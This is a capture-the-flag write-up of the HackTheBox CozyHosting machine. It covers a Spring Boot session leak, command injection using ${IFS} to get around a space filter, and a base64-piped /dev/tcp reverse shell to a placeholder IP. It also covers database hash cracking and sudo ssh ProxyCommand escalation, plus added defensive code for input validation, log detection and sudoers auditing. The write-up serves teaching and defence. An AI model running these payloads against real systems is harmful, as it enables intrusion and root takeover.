HackTheBox-CozyHosting(WriteUp)

Aniket Das
7 min read · Dec 1, 2023


Greetings everyone! I hope you’re all doing great. Another one, after so long, for the writeups list. Let’s go.

*Note: I’ll be showing the answers on top and the explanation just below them, and as always I won’t let you copy-paste. See, understand, type it yourself, repeat and really learn.

Q.1. User Flag

So, take note of the technologies.

So, we found three ports open.

Hmm! Okay. That’s fine for now.

So, we got a login page.

Now, enumerating for subdomains, we couldn’t find anything.

Okay! That’s interesting on the ‘/error’ path.

So, a Google search turned up something interesting: it means the ‘Spring Boot’ framework is in place.

So, fuzzing the directories further as per the article with the ‘spring-boot.txt’ wordlist, we found this actuator directory. Let’s go through the endpoints one by one.

So, in sessions, we located something like a username next to a random string. Maybe we can try it as a cookie and get access to this account. And if that doesn’t work, we can also try to brute-force with this ‘username’.

So, putting the session cookie into the login page, we got access as K. Anderson.

Okay! Thank you so much. LoL!

So, not many features on the page except for this one.

So, a POST request is being made to ‘/executessh’. So, maybe we can get access to the target. Let’s test it then.

So, without the username but with a quote, see how it responded. Maybe we can leverage it somehow to execute our own code. Let’s research.

See what just happened. The command put within the backquotes is getting executed, i.e. a command injection. So, what is actually happening is that the username value is evaluated separately by the shell and its output is then appended to the host IP for the actual execution. It took me a little while to notice, because I initially thought the ‘app’ keyword was part of the error. So, time to get a reverse shell using this.

But the catch is no white spaces are allowed. Let’s see what to do.

So, after struggling for a while, I was unable to bypass this whitespace problem and I think we are in a rabbit hole. Let’s see some other ways.

Finally, going through one of the community solutions, I found that we were on the right track and the alternative for the whitespace character was ${IFS}. This is a variable in bash that contains the word-separator characters (space, tab and newline), so the shell expands it to whitespace.
So, we could have easily found this by fuzzing for other alternatives. No worries, at least we learnt something new. So, looking at ‘/etc/passwd’, we were sure it was working perfectly. So, time to get to a reverse shell then.
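The root cause described above is a username from the request being pasted into a shell command line, and the target’s only defence was rejecting literal spaces. The following is an added example (not the CozyHosting application’s code) that models that pattern in Python: the vulnerable string-building form next to a hardened form that validates the username against an allowlist and hands ssh an argv list so no shell ever parses it. The allowlist regex, the placeholder host and the marker list are assumptions for the example.

```python
import re

# Assumed allowlist for POSIX-style usernames; the real application's
# validation rule (if it had one) is unknown.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Shell metacharacters and the ${IFS} whitespace substitute that turn a
# "username" into extra commands once a shell parses the line.
INJECTION_MARKERS = ("`", "$(", ";", "|", "&", "${IFS}", "\n")


def build_ssh_command_unsafe(host: str, username: str) -> str:
    """Vulnerable pattern: string concatenation passed to a shell.

    Anything in `username` is interpreted by the shell, so backquotes or
    ';' run arbitrary commands on the server, exactly as the write-up shows.
    Blocking literal spaces does not help because ${IFS} expands to one.
    """
    return f"ssh {username}@{host}"


def build_ssh_command_safe(host: str, username: str) -> list:
    """Hardened form: allowlist-validate, then return an argv list.

    The list is meant for subprocess.run(args) with shell=False, so the
    username reaches ssh as a single argument and is never shell-parsed;
    the allowlist rejects ${IFS}, backticks and other metacharacters outright.
    """
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid host")
    return ["ssh", f"{username}@{host}"]


def looks_injected(username: str) -> bool:
    """Input-filter check that flags the shell metacharacters and the
    ${IFS} substitute together, instead of only literal spaces."""
    return any(marker in username for marker in INJECTION_MARKERS)


if __name__ == "__main__":
    host = "127.0.0.1"  # constructed placeholder host
    # payload shape from the write-up, with a harmless command in the backquotes
    injected = "usertest;`id`"
    print(build_ssh_command_unsafe(host, injected))   # shell would run `id`
    print(looks_injected(injected))                   # True
    print(build_ssh_command_safe(host, "usertest"))   # ['ssh', 'usertest@127.0.0.1']
    try:
        build_ssh_command_safe(host, injected)
    except ValueError as exc:
        print("rejected:", exc)
```

The important design choice is that validation and argv-style invocation are both applied: the allowlist stops the obvious payloads, and shell=False means that even a username the allowlist wrongly accepts cannot be reinterpreted as shell syntax.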

So, take the code below, set the IP, URL-encode it and send it to the target.

usertest;`bash${IFS}-c${IFS}'bash${IFS}-i${IFS}-p${IFS}>&${IFS}/dev/tcp/_Tun0IP_/6969${IFS}0>&1'`

So, it catches the redirection, maybe because of some pattern filter. Let’s try to base64-encode it and try once more.

So, this also fails. Now the one thing left to try is base64-encoding the payload and piping it to base64 for decoding.

So, let’s first get it converted to base64 format.

Now we just need to convert it into this format, i.e. replace ‘whoami’ with our base64-encoded reverse shell code, but first pipe it to ‘base64 -d’ to decode it back to plain text and eventually pipe that to bash. In simplified form, this is what happens:

Step 1) echo YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg==|base64 -d|bash
Step 2) base64 -d YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg==|bash
Step 3) echo 'bash -i -p >& /dev/tcp/tun0IP/6969 0>&1'|bash
Step 4) bash -c 'bash -i -p >& /dev/tcp/tun0IP/6969 0>&1'

Just replace the spaces with ${IFS} in

echo YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg==|base64 -d|bash

and that’s it.

Now start the listener, and before sending this, URL-encode it, because due to the ‘+’ character within it, the server still says whitespaces are not allowed.

And there you go, caught the shell.
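From the defender’s side, the request that caught this shell leaves a recognisable trail: backquotes, ${IFS} in place of spaces, a base64 run piped into base64 -d, and, once decoded, a /dev/tcp redirection. The following is an added example (not part of the original write-up) that runs that detection over three constructed access-log lines; it URL-decodes the request, collapses ${IFS} to a space so both spellings match one rule, and decodes any base64-looking run to inspect what it hides. The log lines, IP addresses and the assumption that the /executessh parameters are visible to the log (query string here, or a body-logging proxy for POST bodies) are all constructed for the example; the base64 string is the one shown in the steps above.

```python
import base64
import binascii
import re
import urllib.parse

# Constructed access-log lines in common log format (not taken from the target).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2023:10:00:01 +0000] "POST /executessh?host=10.0.0.2&username=usertest HTTP/1.1" 200 12
10.0.0.5 - - [01/Dec/2023:10:00:07 +0000] "POST /executessh?host=10.0.0.2&username=usertest%3B%60bash%24%7BIFS%7D-c%24%7BIFS%7D%27id%27%60 HTTP/1.1" 200 12
10.0.0.5 - - [01/Dec/2023:10:00:15 +0000] "POST /executessh?host=10.0.0.2&username=usertest%3B%60echo%24%7BIFS%7DYmFzaCAtaSAtcCA%2BJiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg%3D%3D%7Cbase64%24%7BIFS%7D-d%7Cbash%60 HTTP/1.1" 200 12
"""

# Indicator name -> substring to look for after URL-decoding.
INDICATORS = {
    "backtick": "`",
    "ifs_whitespace_bypass": "${IFS}",
    "base64_decode": "base64 -d",
    "dev_tcp": "/dev/tcp/",
    "interactive_bash": "bash -i",
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_b64_tokens(text):
    """Yield the plaintext of every base64-looking run in `text` that decodes cleanly."""
    for token in B64_TOKEN.findall(text):
        try:
            yield base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue


def analyse_request(target):
    """Return the indicator names found in one request target.

    ${IFS} is collapsed to a space before matching so that 'base64${IFS}-d'
    triggers the same rule as 'base64 -d'; indicators found only inside a
    decoded base64 run are reported with an 'encoded:' prefix.
    """
    decoded = urllib.parse.unquote_plus(target)
    flat = decoded.replace("${IFS}", " ")
    hits = []
    for name, needle in INDICATORS.items():
        haystack = decoded if name == "ifs_whitespace_bypass" else flat
        if needle in haystack:
            hits.append(name)
    for plaintext in decode_b64_tokens(flat):
        for name, needle in INDICATORS.items():
            tag = "encoded:" + name
            if needle in plaintext and tag not in hits:
                hits.append(tag)
    return hits


def scan_log(log_text):
    """Return [(line_number, hits)] for every request line carrying an indicator."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = analyse_request(match.group(1))
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Running it flags the second and third lines only; the third line is reported both for the visible base64 -d pipe and for the /dev/tcp and bash -i strings that only appear after decoding, which is the detail a plain keyword match on the raw log would miss.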

So, now we need to pivot to ‘josh’ for the user flag.

So, for now let’s enumerate this Java archive to locate any credentials. I downloaded it to my attacking system and extracted the contents.

I located this in one of the files, but there is no such ‘kanderson’ user on this system.

So, in here we found another credential. Let’s try to log in to ‘postgres’ with it, because we found port 5432 open, which is the default port for this service and hence maybe a clear hint.

So, after connecting, we listed the available databases and found cozyhosting (obviously).

So, got the database selected.

So, ‘users’ table is of our interest for now.

Now let’s dump the column contents of the table ‘users’.

So, let’s try cracking the admin hash, which is of ‘bcrypt’ type.

And it was cracked within a few seconds.

Now I tried this password for user ‘josh’, and there you go.

Q.2. Root Flag

Time for privilege escalation to root.

LoL! That’s way too easy. Let’s head to GTFOBins site.

The ProxyCommand option is a way to tunnel the SSH connection through another command, which is useful where direct connections are not possible. Here, that option carries the command that will act as the proxy. It uses a semicolon (;) to separate it from the preceding part of the command. The command itself (sh 0<&2 1>&2) invokes a new shell with its input and output attached to the current terminal, so when ssh is run as root, the shell is root too.
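The fix for this escalation is on the sudoers side: a rule that lets a user run ssh as root is a full root shell, because ssh will happily execute whatever ProxyCommand it is given. The following is an added example (not part of the original write-up) of a small sudoers audit in Python that parses a constructed rule set and flags rules granting either unrestricted commands or a binary that is documented on GTFOBins as able to spawn a shell when run through sudo. The write-up does not print the sudo -l output, so the josh rule below is a constructed guess at its shape; the other users and rules are constructed as well.

```python
import re

# Constructed sample, not the target's real /etc/sudoers.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
josh    ALL=(root) /usr/bin/ssh *
deploy  ALL=(root) NOPASSWD: /usr/bin/ls /var/log/app
"""

# A few binaries GTFOBins documents as giving a shell when run via sudo
# (ssh via ProxyCommand, the editors and pagers via their shell escapes, ...).
SHELL_CAPABLE = {"ssh", "vim", "vi", "less", "more", "find", "awk", "perl", "python3", "bash", "sh"}

# user host=(runas) [TAG:] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
TAG_RE = re.compile(r"(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")


def parse_rules(sudoers_text):
    """Return one dict per command in every user specification line."""
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        spec = match.group("spec")
        tags = []
        while True:
            tag = TAG_RE.match(spec)
            if not tag:
                break
            tags.append(tag.group(1))
            spec = spec[tag.end():]
        for command in spec.split(","):
            rules.append({
                "user": match.group("user"),
                "runas": match.group("runas") or "root",
                "tags": tags,
                "command": command.strip(),
            })
    return rules


def audit(sudoers_text):
    """Return (user, command, reason) for every rule worth a second look."""
    findings = []
    for rule in parse_rules(sudoers_text):
        command = rule["command"]
        if command == "ALL":
            findings.append((rule["user"], command, "unrestricted"))
            continue
        binary = command.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            reason = f"shell-capable binary: {binary}"
            if "NOPASSWD" in rule["tags"]:
                reason += " (no password required)"
            findings.append((rule["user"], command, reason))
    return findings


if __name__ == "__main__":
    for user, command, reason in audit(SAMPLE_SUDOERS):
        print(f"{user:8} {command:28} {reason}")
```

The josh rule is flagged even though it asks for a password, because the user already holds that password; the remediation is to remove the rule or replace ssh with a wrapper script that fixes the destination and the options, so the user cannot supply ProxyCommand or any other client setting.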

And here is the root flag.

So, I hope you enjoyed it. Follow me for the next one. Until then, Peace!
